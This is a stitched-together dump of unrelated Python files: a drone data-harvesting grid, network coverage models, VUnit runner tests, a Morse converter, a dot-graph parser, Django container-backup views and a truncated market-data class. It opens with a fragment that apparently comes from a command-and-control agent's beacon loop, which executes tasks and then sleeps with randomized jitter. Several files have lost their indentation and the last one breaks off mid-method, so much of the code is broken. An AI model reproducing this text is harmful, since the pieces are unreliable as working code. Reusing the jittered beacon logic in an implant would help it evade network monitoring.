execute_tasks(tasks)
r = random.randint(0,1)
if r < 0.5:
r = -1
else:
r = 1
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
sleep_time = random.randint(0, int(sleep_time))
time.sleep(sleep_time / 5)
|
import numpy as np
from src.DH.Grid import DHGrid, DHGridParams
from src.DHMulti.State import DHMultiState
class DHMultiGridParams(DHGridParams):
    """Grid parameters extended with a configurable number of agents."""

    def __init__(self):
        super().__init__()
        # [min, max] inclusive bounds for the per-episode agent count.
        self.num_agents_range = [1, 3]
class DHMultiGrid(DHGrid):
    """Data-harvesting grid environment supporting a variable number of agents.

    Each episode samples the agent count uniformly from
    ``params.num_agents_range`` (inclusive on both ends).
    """

    def __init__(self, params: DHMultiGridParams, stats):
        super().__init__(params, stats)
        self.params = params
        # Default to the minimum agent count until an episode is initialised.
        self.num_agents = params.num_agents_range[0]

    def init_episode(self):
        """Sample a fresh episode: devices, agent count, start positions, budgets.

        :return: a fully initialised DHMultiState
        """
        self.device_list = self.device_manager.generate_device_list(self.device_positions)

        # Draw the agent count uniformly from the inclusive range. Use the
        # scalar form of randint: int() on a size-1 ndarray is deprecated.
        self.num_agents = int(np.random.randint(low=self.params.num_agents_range[0],
                                                high=self.params.num_agents_range[1] + 1))

        state = DHMultiState(self.map_image, self.num_agents)
        state.reset_devices(self.device_list)

        # replace=False ensures that the starting positions of the agents are different
        idx = np.random.choice(len(self.starting_vector), size=self.num_agents, replace=False)
        state.positions = [self.starting_vector[i] for i in idx]

        state.movement_budgets = np.random.randint(low=self.params.movement_range[0],
                                                   high=self.params.movement_range[1] + 1,
                                                   size=self.num_agents)
        state.initial_movement_budgets = state.movement_budgets.copy()
        return state

    def init_scenario(self, scenario):
        """Initialise the grid from a predefined scenario instead of sampling."""
        self.device_list = scenario.device_list
        self.num_agents = scenario.init_state.num_agents
        return scenario.init_state

    def get_example_state(self):
        """Return a zero-filled template state (e.g. for model construction)."""
        num_agents = self.params.num_agents_range[0]
        state = DHMultiState(self.map_image, num_agents)
        state.device_map = np.zeros(self.shape, dtype=float)
        state.collected = np.zeros(self.shape, dtype=float)
        return state
|
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
import scipy
import scipy.spatial
import yafs.utils
import math
from matplotlib.collections import PatchCollection,PolyCollection
from yafs.utils import haversine_distance
from functools import partial
import pyproj
from shapely.ops import transform
from shapely.geometry import Point
from matplotlib.patches import Circle
class Coverage(object):
    """Abstract base for coverage models that link endpoints to positions.

    The base implementations are no-ops, so a bare ``Coverage`` behaves as
    "no coverage anywhere"; concrete subclasses override the lookups.
    """

    def __init__(self):
        pass

    def update_coverage_of_endpoints(self, **kwargs):
        """Recompute internal structures after endpoint changes (no-op here)."""
        return None

    def connection(self, point):
        """Return the index of the endpoint covering *point* (always None here)."""
        return None

    @staticmethod
    def get_polygons_on_map():
        """Return drawable artists for the coverage regions (none here)."""
        return None

    def connection_between_mobile_entities(self, fixed_endpoints, mobile_endpoints):
        # type: (dict, dict) -> dict
        """
        Args:
            fixed_endpoints: dict , {id_node: (lat,lng)}
            mobile_endpoints: dict, {code_mobile_entity: (lat,lng)}

        Returns:
            dict {code_mobility_entity : id_node} (empty in the base class)
        """
        return {}
class CircleCoverage(Coverage):
    """Coverage model where every endpoint serves a circle of fixed radius (km).

    Endpoint positions are (lat, lng) pairs. Pixel-space positions and circle
    patches are precomputed against the map projection so the coverage can be
    rendered with matplotlib.
    """

    def __init__(self, map, points, radius):
        self.points = points
        self.radius = radius  # radius in km

        # Endpoint positions in the map projection (pixel coordinates).
        self.points_to_map = [map.to_pixels(p[0], p[1]) for p in self.points]

        # Estimate the radius in pixel units: project one point of the
        # geodesic buffer around the first endpoint and measure its pixel
        # distance to the endpoint itself.
        # NOTE(review): __geodesic_point_buffer is declared (lon, lat) but is
        # called here with (lat, lng) argument order -- confirm with callers.
        b = self.__geodesic_point_buffer(points[0][0], points[0][1], self.radius)
        bonmap = map.to_pixels(b[0])
        ponmap = map.to_pixels(points[0][0], points[0][1])
        distance = math.sqrt(math.pow((bonmap[0] - ponmap[0]), 2) + math.pow((bonmap[1] - ponmap[1]), 2))
        self.radius_on_coordinates = distance

        # One Circle patch per endpoint, in map (pixel) coordinates.
        self.regions_to_map = [Circle((region[0], region[1]), self.radius_on_coordinates)
                               for region in self.points_to_map]

        # Colour of the regions: one colour per endpoint, evenly sampled.
        self.cmap = plt.cm.Accent
        self.colors_cells = self.cmap(np.linspace(0., 1., len(self.points)))[:, :3]

    def update_coverage_of_endpoints(self, map, points):
        """
        It updates the points, regions and colors in case of endpoints and
        mobile-endpoints changes.

        Args:
            map: the map projection object (exposes ``to_pixels``)
            points: the new endpoint positions, (lat, lng) pairs
        """
        self.points = points
        self.points_to_map = [map.to_pixels(p[0], p[1]) for p in self.points]
        self.regions_to_map = [Circle((region[0], region[1]), self.radius_on_coordinates)
                               for region in self.points_to_map]
        self.colors_cells = self.cmap(np.linspace(0., 1., len(self.points)))[:, :3]

    def get_polygons_on_map(self):
        """
        Display the network endpoints on the map representation.

        Returns:
            a matplotlib PatchCollection with one circle per endpoint
        """
        return PatchCollection(self.regions_to_map, facecolors=self.colors_cells, alpha=.25)

    def connection(self, point):
        """
        Compute the connection among a user and endpoints.

        In this implementation the preference between several endpoints is
        given by the smallest distance; other policies could be implemented
        by storing a history of connections.

        Args:
            point: [lng, lat] a user position

        Returns:
            the index on self.points of the serving endpoint, or None when
            the point lies outside every circle
        """
        # Slot 0 is a sentinel: if argmin lands there, no endpoint covers
        # the point. Real endpoints occupy slots 1..n, hence the -1 below.
        most_close = [999999999]
        for idx, center in enumerate(self.points):
            dist = haversine_distance(point, center)
            if dist <= self.radius:
                most_close.append(dist)
            else:
                most_close.append(float("inf"))
        best = np.argmin(most_close)
        if best == 0:
            return None
        return best - 1

    def connection_between_mobile_entities(self, fixed_endpoints, mobile_endpoints, mobile_fog_entities):
        # type: (dict, dict, dict) -> dict
        """
        Args:
            fixed_endpoints: dict , {id_node: (lat,lng)}
            mobile_endpoints: dict, {code_mobile_entity: (lat,lng)}
            mobile_fog_entities: dict keyed by entity code; each value carries
                a "connectionWith" entry that, when set, pins the connection

        Returns:
            dict {code_mobility_entity : [id_node]}
        """
        # Materialise the node positions once, outside the loop. list() is
        # required on Python 3: numpy would otherwise wrap the dict_values
        # view into a 0-d object array and the subtraction would fail.
        node_positions = np.array(list(fixed_endpoints.values()))
        node_ids = list(fixed_endpoints)
        result = {}
        for code in mobile_fog_entities:
            if mobile_fog_entities[code]["connectionWith"] is not None:
                # The entity is already pinned to a node; keep that link.
                result[code] = mobile_fog_entities[code]["connectionWith"]
            else:
                point = mobile_endpoints[code]
                idx = np.argmin(np.sum((node_positions - point) ** 2, axis=1))
                pnode = fixed_endpoints[node_ids[idx]]
                # Only connect when the nearest node's circle actually
                # reaches the entity's position.
                if self.__circle_intersection(point, pnode):
                    result[code] = [node_ids[idx]]
        return result

    def __circle_intersection(self, center1, center2):
        """
        Based on: https://gist.github.com/xaedes/974535e71009fa8f090e

        Args:
            center1: coordinates of a circle
            center2: coordinates of a circle

        Returns:
            a boolean: True when the two equal-radius circles touch, overlap
            or one contains the other; False when they are separate
        """
        x1, y1 = center1
        x2, y2 = center2
        r1 = self.radius
        # http://stackoverflow.com/a/3349134/798588
        dx, dy = x2 - x1, y2 - y1
        d = math.sqrt(dx * dx + dy * dy)
        if d > r1 + r1:
            return False  # no solutions, the circles are separate
        return True  # touching, overlapping, or one contained in the other

    def __geodesic_point_buffer(self, lon, lat, km):
        """
        Based on: https://gis.stackexchange.com/questions/289044/creating-buffer-circle-x-kilometers-from-point-using-python

        Args:
            lon: longitude of the buffer centre
            lat: latitude of the buffer centre
            km: buffer radius in kilometres

        Returns:
            a list of coordinates describing a circle of radius ``km`` around
            the centre, in the WGS84 projection
        """
        # NOTE(review): pyproj.Proj(init=...) and pyproj.transform are
        # deprecated since pyproj 2; migrate to pyproj.Transformer when the
        # pinned pyproj version allows it.
        proj_wgs84 = pyproj.Proj(init='epsg:4326')
        # Azimuthal equidistant projection centred on the point, so a plain
        # Euclidean buffer of km * 1000 metres is geodesically correct.
        aeqd_proj = '+proj=aeqd +lat_0={lat} +lon_0={lon} +x_0=0 +y_0=0'
        project = partial(
            pyproj.transform,
            pyproj.Proj(aeqd_proj.format(lat=lat, lon=lon)),
            proj_wgs84)
        buf = Point(0, 0).buffer(km * 1000)  # distance in metres
        return transform(project, buf).exterior.coords[:]
class Voronoi(Coverage):
    def __init__(self, map, points):
        """Build a Voronoi tessellation over the endpoint positions.

        Args:
            map: map projection object exposing ``to_pixels`` -- assumed to
                accept an array of vertices here; TODO confirm interface
            points: endpoint positions, one (lat, lng) pair per endpoint
        """
        self.tree = None
        self.points = points
        # Raw scipy Voronoi diagram of the endpoint positions.
        self.__vor = scipy.spatial.Voronoi(self.points)
        # Clip the open (infinite) regions so every cell is a finite polygon.
        self.regions, self.vertices = self.voronoi_finite_polygons_2d(self.__vor)
        # Cell polygons projected into map (pixel) coordinates for drawing.
        self.cells = [map.to_pixels(self.vertices[region]) for region in self.regions]
        # One colour per endpoint, evenly sampled from the Set3 palette.
        cmap = plt.cm.Set3
        self.colors_cells = cmap(np.linspace(0., 1., len(self.points)))[:, :3]
def update_coverage_of_endpoints(self, map, points):
self.points = points
self.__vor = scipy.spatial.Voronoi(self.points)
self.regions, self.vertices = self.voronoi_finite_polygons_2d(self.__vor)
self.cells = [map.to_pixels(self.vertices[region]) for region in self.regions]
cmap = plt.cm.Set3
self.colors_cells = cmap(np.linspace(0., 1., len(self.points)))[:, :3]
def get_polygons_on_map(self):
return PolyCollection(self.cells, facecolors=self.colors_cells, alpha=.25,edgecolors="gray")
def connection(self,point):
"""
Args:
point: [lng,lat]
Returns:
the index on self.points
"""
return np.argmin(np.sum((self.points - point) ** 2, axis=1))
def connection_between_mobile_entities(self,fixed_endpoints,mobile_endpoints):
# type: (dict, dict) -> dict
"""
Args:
fixed_endpoints: dict , {id_node: (lat,lng)}
mobile_endpoints: dict, {code_mobile_entity: (lat,lng)}
Returns:
dict {code_mobility_entity : id_node}
"""
result = {}
for k in mobile_endpoints:
point = mobile_endpoints[k]
idx = np.argmin(np.sum((np.array(fixed_endpoints.values()) - point) ** 2, axis=1))
result[k] = list(fixed_endpoints)[idx]
return result
def voronoi_finite_polygons_2d(self, vor, radius=None):
"""Reconstruct infinite Voronoi regions in a
2D diagram to finite regions.
Source:
[https://stackoverflow.com/a/20678647/1595060](https://stackoverflow.com/a/20678647/1595060)
"""
if vor.points.shape[1] != 2:
raise ValueError("Requires 2D input")
new_regions = []
new_vertices = vor.vertices.tolist()
center = vor.points.mean(axis=0)
if radius is None:
radius = vor.points.ptp().max()
# Construct a map containing all ridges for a
# given point
all_ridges = {}
for (p1, p2), (v1, v2) in zip(vor.ridge_points,
vor.ridge_vertices):
all_ridges.setdefault(
p1, []).append((p2, v1, v2))
all_ridges.setdefault(
p2, []).append((p1, v1, v2))
# Reconstruct infinite regions
for p1, region in enumerate(vor.point_region):
vertices = vor.regions[region]
if all(v >= 0 for v in vertices):
# finite region
new_regions.append(vertices)
continue
# reconstruct a non-finite region
ridges = all_ridges[p1]
new_region = [v for v in vertices if v >= 0]
for p2, v1, v2 in ridges:
if v2 < 0:
v1, v2 = v2, v1
if v1 >= 0:
# finite ridge: already in the region
continue
# Compute the missing endpoint of an
# infinite ridge
t = vor.points[p2] - \
vor.points[p1] # tangent
t /= np.linalg.norm(t)
n = np.array([-t[1], t[0]]) # normal
midpoint = vor.points[[p1, p2]]. \
mean(axis=0)
direction = np.sign(
np.dot(midpoint - center, n)) * n
far_point = vor.vertices[v2] + \
direction * radius
new_region.append(len(new_vertices))
new_vertices.append(far_point.tolist())
# Sort region counterclockwise.
vs = np.asarray([new_vertices[v]
for v in new_region])
c = vs.mean(axis=0)
angles = np.arctan2(
vs[:, 1] - c[1], vs[:, 0] - c[0])
new_region = np.array(new_region)[
np.argsort(angles)]
new_regions.append(new_region.tolist())
return new_regions, np.asarray(new_vertices)
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (c) 2014, Lars Asplund lars.anders.asplund@gmail.com
from __future__ import print_function
import unittest
from os.path import join, dirname, exists
from shutil import rmtree
try:
# Python 3.x (builtin)
from unittest.mock import Mock
except:
# Python 2.7 (needs separate install)
from mock import Mock
from vunit.test_runner import TestRunner
from vunit.test_report import TestReport, PASSED, FAILED
from vunit.test_list import TestList
class TestTestRunner(unittest.TestCase):
    """Tests for TestRunner: ordering, exception handling and output capture."""

    def setUp(self):
        # Names of the tests that actually ran, in execution order
        self._tests = []
        self.output_path = join(dirname(__file__), "test_runner_out")
        if exists(self.output_path):
            rmtree(self.output_path)
        self.report = TestReport()
        self.runner = TestRunner(self.report, self.output_path)

    def test_runs_testcases_in_order(self):
        passing = self.create_test("test1", True)
        failing = self.create_test("test2", False)
        suite = TestList()
        suite.add_test(passing)
        suite.add_test(failing)
        self.runner.run(suite)
        passing.run.assert_called_once_with(join(self.output_path, "test1"))
        failing.run.assert_called_once_with(join(self.output_path, "test2"))
        self.assertEqual(self._tests, ["test1", "test2"])
        self.assertTrue(self.report.result_of("test1").passed)
        self.assertTrue(self.report.result_of("test2").failed)

    def test_handles_python_exeception(self):
        # A test raising an unexpected Python exception is reported as failed
        broken = self.create_test("test", True)
        suite = TestList()
        suite.add_test(broken)
        broken.run.side_effect = KeyError
        self.runner.run(suite)
        self.assertTrue(self.report.result_of("test").failed)

    def test_collects_output(self):
        noisy = self.create_test("test", True)
        suite = TestList()
        suite.add_test(noisy)
        output = "Output string, <xml>, </xml>\n"

        def write_output(*args, **kwargs):
            print(output, end="")
            return True

        noisy.run.side_effect = write_output
        self.runner.run(suite)
        self.assertTrue(self.report.result_of("test").passed)
        self.assertEqual(self.report.result_of("test").output, output)

    def create_test(self, name, passed):
        """Create a Mock test case recording its run and returning *passed*."""
        test_case = Mock(spec_set=TestCaseMockSpec)
        test_case.configure_mock(name=name)

        def record_run(*args, **kwargs):
            self._tests.append(name)
            return passed

        test_case.run.side_effect = record_run
        return test_case
class TestCaseMockSpec:
    """
    Attribute specification for Mock(spec_set=...) test-case doubles:
    only these names may be set or called on the mock.
    """
    run = None
    name = None
|
# Morse code converter (interactive CLI):
# option 1 encodes text to Morse, option 2 decodes Morse back to text.
import string

# Character -> Morse table.  Fixed: 'K': '-.-' was missing from the
# original table, so any text containing K silently lost that letter.
s2m = {'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.',
       'F': '..-.', 'G': '--.', 'H': '....', 'I': '..', 'J': '.---',
       'K': '-.-', 'L': '.-..', 'M': '--', 'N': '-.', 'O': '---',
       'P': '.--.', 'Q': '--.-', 'R': '.-.', 'S': '...', 'T': '-',
       'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-', 'Y': '-.--',
       'Z': '--..', '1': '.----', '2': '..---', '3': '...--',
       '4': '....-', '5': '.....', '6': '-....', '7': '--...',
       '8': '---..', '9': '----.', '0': '-----'}
upca = list(string.ascii_uppercase)  # kept for compatibility; unused below
t = True  # main-loop flag; set False when the user chooses to quit
while t:
    aux = []  # input characters (encode) / morse tokens (decode)
    f = []    # translated output tokens
    o = i = True
    # Menu: keep asking until a valid option is chosen
    while i:
        # Fixed: strip first and slice with [:1] so an empty line cannot
        # raise IndexError (the original indexed [0] on the raw input).
        op = str(input('1 - string para morse\n2 - morse para string\n>>> ')).strip()[:1]
        if op == '1' or op == '2':
            i = False
        else:
            print('\033[31mFavor selecionar uma opção válida\033[m')
    while o:
        if op == '1':
            # Encode: each character becomes a Morse token
            inp = str(input('\ninsira o texto a ser codificado: ')).strip().upper()
            for n in inp:
                aux.append(n)
            for m in aux:
                for k, v in s2m.items():
                    if k == m:
                        f.append(v)
            if f == []:
                print(f'\033[31mNão é possível CODIFICAR [{inp}]\033[m')
            else:
                print(f'\033[32m{inp} codificado é: \033[m', end=' ')
                for p in f:
                    print(p, end=' ')
            o = False
        elif op == '2':
            # Decode: space-separated Morse tokens back to characters
            inp = str(input('\ninsira o texto a ser decodificado: '))
            aux = inp.split(' ')
            for m in aux:
                for k, v in s2m.items():
                    if v == m:
                        f.append(k)
            if f == []:
                print(f'\033[31m Não é possível DECODIFICAR [{inp}]\033[m')
            else:
                print(f'\033[32m{inp} decodificado é: \033[m', end=' ')
                for p in f:
                    print(p, end=' ')
            o = False
        else:
            print('\033[31mFavor digitar um valor válido\033[m')
    # Fixed: same empty-input-safe slicing as the menu prompt
    dsc = str(input('\n\nDeseja sair do programa?[S/N]: ')).strip()[:1].lower()
    if dsc == 's':
        t = False
    else:
        continue
# Standard Modules
import re
import sys
# Custom Modules
from hdl_signal import HDL_Signal
from connection import Connection
# Node Shapes -- the dot-file "shape" attribute values recognised by parse_file
SIGNAL_NODE_SHAPE = "ellipse"         # regular signal node
LOCAL_SIGNAL_NODE_SHAPE = "none"      # locally-scoped signal node
FF_NODE_SHAPE = "square"              # flip-flop node (marks the signal as FF)
INPUT_NODE_SHAPE = "rectangle"        # input node (marks the signal as input)
CONST_NODE_SHAPE = "none"             # constant-value node
# Constant Prefix
CONST_HIERARCHY = 'const.'  # signals under this hierarchy are constants and skipped
def parse_file(file_name):
# counters
num_signals = 0
num_connections = 0
# Open the dot file for reading
with open(file_name, 'r') as f:
read_contents = f.read()
lines = read_contents.splitlines()
if "digraph G {" not in lines[0]:
sys.stderr.write("Error: Invalid file format\n")
sys.exit(1)
if len(lines) >= (1 << 20):
sys.stderr.write("Error: Over a million signals. Too many to handle\n")
sys.exit(1)
# Create signals dictionary
signals = {}
# Compile Regexes
signals_re = re.compile('\"[\w\.]+(\$[\d]+\$)?\" \[shape=([A-Za-z]+), label=\"([\w\.]+)(\$([\d]+)\$)?\[(\d+):(\d+)\]\"\]')
conns_re = re.compile('\"([\w\.]+)(\$([\d]+)\$)?\" -> \"([\w\.]+)(\$([\d]+)\$)?\"\[label=\"\[(\d+):(\d+)\]->\[(\d+):(\d+)\]\"\]')
# Parse all signals first
lineno = 1
print "Parsing signals..."
while "}" not in lines[lineno] and lineno < len(lines):
if "->" not in lines[lineno]:
# Parse signal information
m = signals_re.search(lines[lineno])
# Check if signal information was found
if (None == m):
print "Error: Bad (node) format at line " + str(lineno + 1)
sys.exit(2)
# Get signal info
fullname = m.group(3)
msb = int(m.group(6))
lsb = int(m.group(7))
shape = m.group(2)
if m.group(5):
array_ind = int(m.group(5))
else:
array_ind = None
# Check signal is NOT a const
if not fullname.startswith(CONST_HIERARCHY):
# Create signal object
s = HDL_Signal(fullname, msb, lsb, array_ind)
# Mark if signal is an INPUT or FLIPFLOP
if shape == INPUT_NODE_SHAPE:
s.isinput = True
elif shape == FF_NODE_SHAPE:
s.isff = True
# Add signal to dictionary
num_signals += 1
signals[s.fullname()] = s
lineno += 1
print "%d signals found." % (num_signals)
# Parse all connections
lineno = 1
print
print "Parsing connections..."
while "}" not in lines[lineno] and lineno < len(lines):
if "->" in lines[lineno]:
# Parse connection information
m = conns_re.search(lines[lineno])
# Check if conection information was found
if None == m:
print "Error: Bad (connection) format at line " + str(lineno + 1)
sys.exit(2)
# Check source signal is NOT a const
if not m.group(1).startswith(CONST_HIERARCHY):
# Get connection info (sink signal)
sink_msb = int(m.group(9))
sink_lsb = int(m.group(10))
if m.group(6):
sink_array_ind = int(m.group(6))
sink_sig = signals[m.group(4) + '[' + str(sink_array_ind) + ']']
else:
sink_array_ind = None
sink_sig = signals[m.group(4)]
# Get connection info (source signal)
source_msb = int(m.group(7))
source_lsb = int(m.group(8))
if m.group(3):
source_array_ind = int(m.group(3))
source_sig = signals[m.group(1) + '[' + str(source_array_ind) + ']']
else:
source_array_ind = None
source_sig = signals[m.group(1)]
# Add connection information
num_connections += 1
c = Connection(sink_sig, sink_msb, sink_lsb, source_sig, source_msb, source_lsb)
signals[sink_sig.fullname()].add_conn(c)
lineno += 1
print "%d connections found." % (num_connections)
print
assert "}" in lines[lineno]
assert lineno + 1 == len(lines)
return signals
|
# -*- coding: utf-8 -*-
""" Backup interface views. """
import json
import logging
import requests
import time
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponse
from django.utils.translation import gettext_lazy as _
from django.contrib.auth.decorators import login_required
from keystoneclient import exceptions
from storage.models import BackupContainer
from storage.utils import get_token_id, get_storage_endpoint
from vault import utils
from identity.keystone import Keystone, exceptions
from actionlogger.actionlogger import ActionLogger
log = logging.getLogger(__name__)
actionlog = ActionLogger()
def _check_backup_user(request, project_id):
    """Grant or revoke the backup role for the backup user on a project.

    While the project still has containers flagged for backup, the user
    settings.BACKUP_USER gets settings.BACKUP_USER_ROLE; once no flagged
    container remains the role is removed.

    Returns True on success, False on any Keystone/configuration failure.
    """
    try:
        keystone = Keystone(request)
    except exceptions.AuthorizationFailure:
        msg = _('Unable to retrieve Keystone data')
        messages.add_message(request, messages.ERROR, msg)
        log.error(f'{request.user}: {msg}')
        return False
    if keystone.conn is None:
        log.error('check_backup_user: Keystone connection error')
        return False
    # Locate the configured backup user among all Keystone users
    backup_user = None
    for user in keystone.user_list():
        if user.username == settings.BACKUP_USER:
            backup_user = user
    if backup_user is None:
        log.error('check_backup_user: Undefined backup user')
        return False
    # Locate the configured backup role
    backup_role = None
    for role in keystone.role_list():
        if role.name == settings.BACKUP_USER_ROLE:
            backup_role = role
    if backup_role is None:
        log.error('check_backup_user: Undefined backup role')
        return False
    items = BackupContainer.objects.filter(project_id=project_id)
    if items.count() == 0:
        # No container flagged anymore: revoke the role
        keystone.remove_user_role(project=project_id,
                                  role=backup_role,
                                  user=backup_user)
        return True
    try:
        keystone.add_user_role(project=project_id,
                               role=backup_role,
                               user=backup_user)
    except exceptions.Conflict:
        # Role already granted: not an error. Fixed: the original message
        # called .format(project_id) on a string with no placeholder.
        log.info('backup_user already with role on project {}'.format(project_id))
    return True
def _enable_backup(container, project_id, project_name):
    """Register a container in the backup API and persist a BackupContainer row.

    Idempotent: returns True when the row already exists. Returns False on
    any request or database error.
    """
    create_url = 'http://{}:{}@{}/config/create'.format(
        settings.BACKUP_API_USER,
        settings.BACKUP_API_PASSWORD,
        settings.BACKUP_API_URL
    )
    try:
        # NOTE(review): the HTTP status of this response is not checked;
        # a non-2xx reply is silently treated as success — confirm intended.
        requests.post(create_url, json={
            'name': '{}_{}'.format(project_name, container),
            'type': 'swift',
            'parameters': {
                'endpoint_type': 'admin',
                'env_auth': 'true',
                'tenant': project_name
            }
        })
    except Exception as err:
        log.error('Enable backup error: {}'.format(err))
        return False
    # Already registered locally: nothing more to do
    items = BackupContainer.objects.filter(container=container,
                                           project_id=project_id)
    if items.count() > 0:
        return True
    try:
        item = BackupContainer(container=container,
                               project_id=project_id,
                               project_name=project_name)
        item.save()
    except Exception as err:
        log.error('Enable backup error: {}'.format(err))
        return False
    return True
def _disable_backup(container, project_id, project_name):
    """Deregister a container from the backup API and drop its BackupContainer row.

    Idempotent: returns True when no row exists. Returns False on any
    request or database error.
    """
    delete_url = 'http://{}:{}@{}/config/delete'.format(
        settings.BACKUP_API_USER,
        settings.BACKUP_API_PASSWORD,
        settings.BACKUP_API_URL
    )
    try:
        # NOTE(review): response status intentionally unchecked, matching
        # _enable_backup — confirm this best-effort behavior is intended.
        requests.post(delete_url, json={
            'name': '{}_{}'.format(project_name, container)
        })
    except Exception as err:
        log.error('Disable backup error: {}'.format(err))
        return False
    items = BackupContainer.objects.filter(container=container,
                                           project_id=project_id)
    if items.count() == 0:
        return True
    try:
        items[0].delete()
    except Exception as err:
        log.error('Disable backup error: {}'.format(err))
        return False
    return True
@utils.project_required
@login_required
def backup_restore(request, project):
    """Trigger an async restore of a container backup into a fresh container.

    POST params: container, project_name, backup_type (daily/weekly/monthly,
    anything else falls back to monthly). Returns JSON with a message and,
    on success, the backup API job id; HTTP 500 on failure.
    """
    container = request.POST.get("container")
    project_name = request.POST.get("project_name")
    backup_type = request.POST.get("backup_type")
    content = {'message': ''}
    restore_url = 'http://{}:{}@{}/sync/copy'.format(
        settings.BACKUP_API_USER,
        settings.BACKUP_API_PASSWORD,
        settings.BACKUP_API_URL
    )
    # Map backup period to its S3 bucket
    if backup_type == 'daily':
        s3_bucket = 'swift-backup-daily'
    elif backup_type == 'weekly':
        s3_bucket = 'swift-backup-weekly'
    else:
        s3_bucket = 'swift-backup-monthly'
    name = '{}_{}'.format(project_name, container)
    # Timestamp suffix keeps repeated restores from clashing
    ts = int(time.time())
    restore_container = '{}_{}_{}'.format(container, backup_type, ts)
    content['message'] = 'Backup restaurado no container: {}'.format(restore_container)
    try:
        req = requests.post(restore_url, json={
            "srcFs": "amazon:/{}/{}/{}".format(s3_bucket, project_name, container),
            "dstFs": "{}:/{}".format(name, restore_container),
            "_async": True
        })
        result = req.json()
        content['job'] = result['jobid']
    except Exception as err:
        log.error('Restore backup error: {}'.format(err))
        content['message'] = 'Restore backup error: {}'.format(err)
        return HttpResponse(json.dumps(content),
                            content_type='application/json',
                            status=500)
    return HttpResponse(json.dumps(content),
                        content_type='application/json',
                        status=200)
def check_backup_conditions(request, container):
    """Check a container is small enough (object count and bytes) to back up.

    Issues a HEAD request against the storage admin endpoint and compares
    the container's object count and byte usage against the configured
    limits. Returns (ok, message).
    """
    backup_object_count_value = int(settings.BACKUP_OBJECT_COUNT_VALUE)
    backup_object_bytes_value = int(settings.BACKUP_OBJECT_BYTES_VALUE)
    storage_url = get_storage_endpoint(request, 'adminURL')
    headers = {'X-Storage-Token': get_token_id(request)}
    url = '{0}/{1}'.format(storage_url, container)
    response = requests.head(url, headers=headers,
                             verify=not settings.SWIFT_INSECURE)
    if int(response.headers['X-Container-Object-Count']) >= backup_object_count_value:
        return False, _('Error when activating container backup. Container cannot contain more than {} objects').format(backup_object_count_value)
    if int(response.headers['X-Container-Bytes-Used']) >= backup_object_bytes_value:
        # Fixed: the byte-limit message previously reported the
        # object-count limit instead of the byte limit.
        return False, _('Error when activating container backup. Container cannot contain more than {}').format(backup_object_bytes_value)
    return True, 'Success'
@utils.project_required
@login_required
def config_backup_container(request, project, container):
    """Enable or disable backup for a container (?status=enabled|disabled).

    Validates the status parameter, checks size conditions, updates the
    backup API plus the local BackupContainer table, and keeps the backup
    user's role in sync. Returns a JSON message with an HTTP status of
    200 (ok), 400 (bad parameter), 412 (size conditions) or 500 (failure).
    """
    action = request.GET.get('status')
    # Fixed: the original condition used "is None and", which let invalid
    # non-empty values (e.g. ?status=foo) slip past validation. Membership
    # alone also rejects a missing parameter (None is not in the list).
    if action not in ['enabled', 'disabled']:
        return HttpResponse(
            json.dumps({'message': _('Wrong "status" parameter')}),
            content_type='application/json',
            status=400
        )
    project_id = request.session.get('project_id')
    project_name = request.session.get('project_name')
    status = 200
    content = {'message': ''}
    result = False
    conditions, msg = check_backup_conditions(request, container)
    if conditions:
        if action == 'enabled':
            result = _enable_backup(container, project_id, project_name)
            msg = '{} "{}"'.format(_('Backup enabled for container'), container)
        if action == 'disabled':
            result = _disable_backup(container, project_id, project_name)
            msg = '{} "{}"'.format(_('Backup disabled for container'), container)
        if result:
            check_ok = _check_backup_user(request, project_id)
            if not check_ok:
                # Roll back: without the role the backup user cannot act
                _disable_backup(container, project_id, project_name)
                status = 500
                msg = _("Backup status error: can't set backup user permission")
                log.error('{}. Project: {}, Container: {}'.format(msg,
                                                                  project_name,
                                                                  container))
        else:
            status = 500
            msg = _('Error when updating container backup status')
            log.error('{}. Project: {}, Container: {}'.format(msg,
                                                              project_name,
                                                              container))
    else:
        status = 412
    content['message'] = msg
    return HttpResponse(json.dumps(content),
                        content_type='application/json',
                        status=status)
def get_current_backup(container, project_id):
    """Return the BackupContainer row for (container, project_id), or None.

    Also returns None when backups are globally disabled in settings.
    """
    if not settings.BACKUP_ENABLED:
        return None
    matches = BackupContainer.objects.filter(container=container,
                                             project_id=project_id)
    return matches[0] if matches.count() > 0 else None
@utils.project_required
@login_required
def container_backup_status(request, project, container):
    """Return JSON {'status': 'enabled'|'disabled'} for a container's backup."""
    project_id = request.session.get('project_id')
    content = {'status': 'disabled'}
    if get_current_backup(container, project_id):
        content['status'] = 'enabled'
    return HttpResponse(json.dumps(content),
                        content_type='application/json',
                        status=200)
# storage API
def container_backup_list(request):
    """List every container flagged for backup as JSON; 404 when none exist."""
    status = 200
    content = []
    items = BackupContainer.objects.all()
    if items.count() > 0:
        for entry in items:
            content.append({"container": entry.container,
                            "project_id": entry.project_id,
                            "project_name": entry.project_name})
    else:
        status = 404
        log.info(_("Can't find any container to backup"))
    return HttpResponse(json.dumps(content),
                        content_type='application/json',
                        status=status)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import pandas as pd
class DataBoard(object):
    """
    Data tracker that holds current market data info: the most recent tick
    per symbol plus any registered historical datasets.
    """
    def __init__(self):
        self._hist_data_dict = {}     # data_key -> historical DataFrame
        self._current_data_dict = {}  # full_symbol -> latest tick object
        self._current_time = None     # timestamp of the most recent tick
        self._PLACEHOLDER = 'PLACEHOLDER'
        self._data_index = None       # cached union of all historical indexes

    def initialize_hist_data(self, data_key, data):
        """Register historical data under data_key (symbol or FUT root)."""
        self._hist_data_dict[data_key] = data

    def on_tick(self, tick):
        """Store the latest tick for its symbol and advance current time."""
        # The original pre-seeded the key with None before overwriting it;
        # a plain assignment is equivalent.
        self._current_data_dict[tick.full_symbol] = tick
        self._current_time = tick.timestamp

    def get_last_price(self, symbol):
        """
        Returns the most recent price for a given ticker: live tick first,
        then full-symbol history, then FUT-root history; None if unknown.
        """
        if symbol in self._current_data_dict:
            return self._current_data_dict[symbol].price
